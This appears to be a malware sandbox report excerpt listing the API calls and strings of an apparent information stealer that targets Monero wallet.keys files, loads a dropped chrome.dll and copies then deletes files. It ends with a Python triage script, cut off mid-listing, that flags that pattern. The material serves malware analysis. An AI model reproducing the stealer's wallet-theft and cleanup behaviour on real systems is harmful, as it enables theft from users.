                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 4a9eeaf652dd2b7359950794273e1374af7b497914450cf22b916781dc6e0679
                                    • Instruction ID: 05293e8f6d1a0ec57ef4f3f4d68d5fede55070baad59912cd5aca8a94367561c
                                    • Opcode Fuzzy Hash: 4a9eeaf652dd2b7359950794273e1374af7b497914450cf22b916781dc6e0679
                                    • Instruction Fuzzy Hash: 5F0131B9A44209BFDB00DFD5DC49FAEB7B8EB4C700F004195FA45A7290D770AA048BA0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 6ee10bfb79a97fd94d6ce25808f613dd26402d432ad6f9e2c68dc91c415ebad8
                                    • Instruction ID: 495f1acaf37b14db4f0b41d913bd56391e9c16de7dd820c2bb61f728ad71ac8d
                                    • Opcode Fuzzy Hash: 6ee10bfb79a97fd94d6ce25808f613dd26402d432ad6f9e2c68dc91c415ebad8
                                    • Instruction Fuzzy Hash: 3941E4B11007DC5EDB218B258D85FFBBFE8DB45704F2444E8E98A97282E3719A45DFA0
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00BE6903
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BE69C6
                                    • ExitProcess.KERNEL32 ref: 00BE69F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 3c28cf2f3ca54ca40a714fabfe3689990a5d6ac7ab4786dc39cffd9fc4f22b5e
                                    • Instruction ID: f353927b7cc0c4edfd3f29d344aa96a4a1b8bcd92fea3c0e9fc0015aeab49c64
                                    • Opcode Fuzzy Hash: 3c28cf2f3ca54ca40a714fabfe3689990a5d6ac7ab4786dc39cffd9fc4f22b5e
                                    • Instruction Fuzzy Hash: 833104B1901258AADB14EBA1DD92FDEB7B8AF18300F404199F20976191DF747A48CF69
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BF0E10,00000000,?), ref: 00BE89BF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE89C6
                                    • wsprintfA.USER32 ref: 00BE89E0
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 82dde13f265f8affd1c3a66622bce2a76b3ed605c0f8d195026bacffea992253
                                    • Instruction ID: 358f761a7656750553bb200ed4b1734e973c0aabd6d796f82c5d03c9b301d35b
                                    • Opcode Fuzzy Hash: 82dde13f265f8affd1c3a66622bce2a76b3ed605c0f8d195026bacffea992253
                                    • Instruction Fuzzy Hash: 6F213DB2A44208AFDB00DF95DD45FAEBBB8FB4D710F104559FA15B7290C775A904CBA0
                                    APIs
                                    • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BDA098
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                    • API String ID: 1029625771-1545816527
                                    • Opcode ID: cdfd93891722219a6da5d7afe23951da3df290f6938e0abd807a203ff1ba3bc6
                                    • Instruction ID: 52018491c81cb2e0f86c96f0530cfd07c127762069dc47d3494b3f037fb06594
                                    • Opcode Fuzzy Hash: cdfd93891722219a6da5d7afe23951da3df290f6938e0abd807a203ff1ba3bc6
                                    • Instruction Fuzzy Hash: 91F01D7175D204AED710DB6AECCDB6676E4E34B300F0009A5E185B72E0E275688CDB56
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BE96AE,00000000), ref: 00BE8EEB
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE8EF2
                                    • wsprintfW.USER32 ref: 00BE8F08
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 5d11956cb692934614c4b76795f24551a4960e4fa5c56801883921c31c5a1609
                                    • Instruction ID: d0d23965c359ff579ada19d21dada905cbc45d9bccc91700f157228d5ff1189d
                                    • Opcode Fuzzy Hash: 5d11956cb692934614c4b76795f24551a4960e4fa5c56801883921c31c5a1609
                                    • Instruction Fuzzy Hash: C9E086B1A48308BFD700DB95DD0AE6D77B8EB09301F000094FD4997350D9716E048BA1
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BDAA11
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 00BDAB2F
                                    • lstrlen.KERNEL32(00000000), ref: 00BDADEC
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BDAE73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: b2328baaa6d5b17abdc855fa0641082abb76873729ef4da865269a5924a51822
                                    • Instruction ID: e6b9f5ec2c64f25450da6952ee4c9bc73a2d30726f9fa71db9dd688d50e8fc70
                                    • Opcode Fuzzy Hash: b2328baaa6d5b17abdc855fa0641082abb76873729ef4da865269a5924a51822
                                    • Instruction Fuzzy Hash: 18E1BB72D101489ACB14EBA5DDA2EEE77BDAF24300F5185D9F11672191EF307A4CCB62
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BDD581
                                    • lstrlen.KERNEL32(00000000), ref: 00BDD798
                                    • lstrlen.KERNEL32(00000000), ref: 00BDD7AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BDD82B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 9d489d7472c66f5550ad01bb1d6250ff485be0cbc896339ec61dd86591ca42e6
                                    • Instruction ID: 657af60084e81f562186007e1df502d4edc014f92cc86a9ea6d5aa339ed8084c
                                    • Opcode Fuzzy Hash: 9d489d7472c66f5550ad01bb1d6250ff485be0cbc896339ec61dd86591ca42e6
                                    • Instruction Fuzzy Hash: C891DC72D101489BCB14EBB5DDA2EEE77BDAF64300F5185E9F11662191EF307A08CB62
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BDD901
                                    • lstrlen.KERNEL32(00000000), ref: 00BDDA9F
                                    • lstrlen.KERNEL32(00000000), ref: 00BDDAB3
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BDDB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 1046845ad1af2080204d8b99ad0e50bbc4062c23ce76628b8841a8261530e28b
                                    • Instruction ID: ed0bc08c51d1a8b85077436dcbb1ac6df42ec8e8504f3471ccbeb0a934ad980d
                                    • Opcode Fuzzy Hash: 1046845ad1af2080204d8b99ad0e50bbc4062c23ce76628b8841a8261530e28b
                                    • Instruction Fuzzy Hash: F881DE72D101489BCB04FBB5DCA2EEE77BDAF64300F5145A9F51662191EF347A08CB62
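The three functions above (call sites 00BDAA11, 00BDD581 and 00BDD901) share one shape: a direct CopyFileA, then a direct DeleteFileA later in the same routine, with the string \Monero\wallet.keys reaching them through the shared path-building callees. A report like this one lists hundreds of such functions, so it pays to parse the "APIs" listings and pick out that copy-then-delete pattern automatically rather than by eye. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample; the listing format, the two sample blocks and every address in them are copied from the report lines above, while the parser, the class names and the heuristic (a direct CopyFileA followed, by address, by a direct DeleteFileA, with path-like arguments collected from the function and its callees) are this example's own assumptions.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One call line of a Joe Sandbox "APIs" listing. Three shapes occur in the report:
#   • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BDAA11
#   • wsprintfW.USER32 ref: 00BE8F08                         (no argument list)
#   • Part of subcall function 00BEACC0: lstrlen.KERNEL32(...), ref: 00BEACD5
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
BLOCK_END = {"Strings", "Memory Dump Source"}   # labels that follow a listing


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                  # address of the call site
    subcall: int | None = None  # callee address when the call is inherited


@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)

    def direct(self, api: str) -> list[ApiCall]:
        # Calls made by the function itself, not inherited from callees.
        return [c for c in self.calls if c.api == api and c.subcall is None]

    def path_args(self) -> list[str]:
        # Arguments that look like Windows paths, from direct and inherited calls.
        return sorted({a for c in self.calls for a in c.args if "\\" in a})


def parse_api_blocks(text: str) -> list[FunctionBlock]:
    """Split report text into one FunctionBlock per "APIs" section."""
    blocks: list[FunctionBlock] = []
    current: FunctionBlock | None = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        if stripped in BLOCK_END:
            current = None
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            current.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return blocks


def find_stage_and_delete(block: FunctionBlock) -> dict | None:
    """Flag a direct CopyFileA followed (by address) by a direct DeleteFileA.

    Returns both call sites plus the path-like strings seen in the function
    or its callees, or None when the pattern is absent.
    """
    deletes = block.direct("DeleteFileA")
    for cp in block.direct("CopyFileA"):
        later = [d for d in deletes if d.ref > cp.ref]
        if later:
            return {"copy_ref": cp.ref, "delete_ref": later[0].ref, "paths": block.path_args()}
    return None


def triage(text: str) -> list[dict]:
    """Run the heuristic over every "APIs" block of a report excerpt."""
    return [hit for b in parse_api_blocks(text) if (hit := find_stage_and_delete(b))]


# Two listings copied from the report above: the heap/wsprintfW helper at
# 00BE8EEB (no file activity) and the routine spanning 00BDAA11..00BDAE73.
REPORT_EXCERPT = r"""
APIs
• GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BE96AE,00000000), ref: 00BE8EEB
• RtlAllocateHeap.NTDLL(00000000), ref: 00BE8EF2
• wsprintfW.USER32 ref: 00BE8F08
Strings
Memory Dump Source
APIs
  • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
  • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
  • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
  • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
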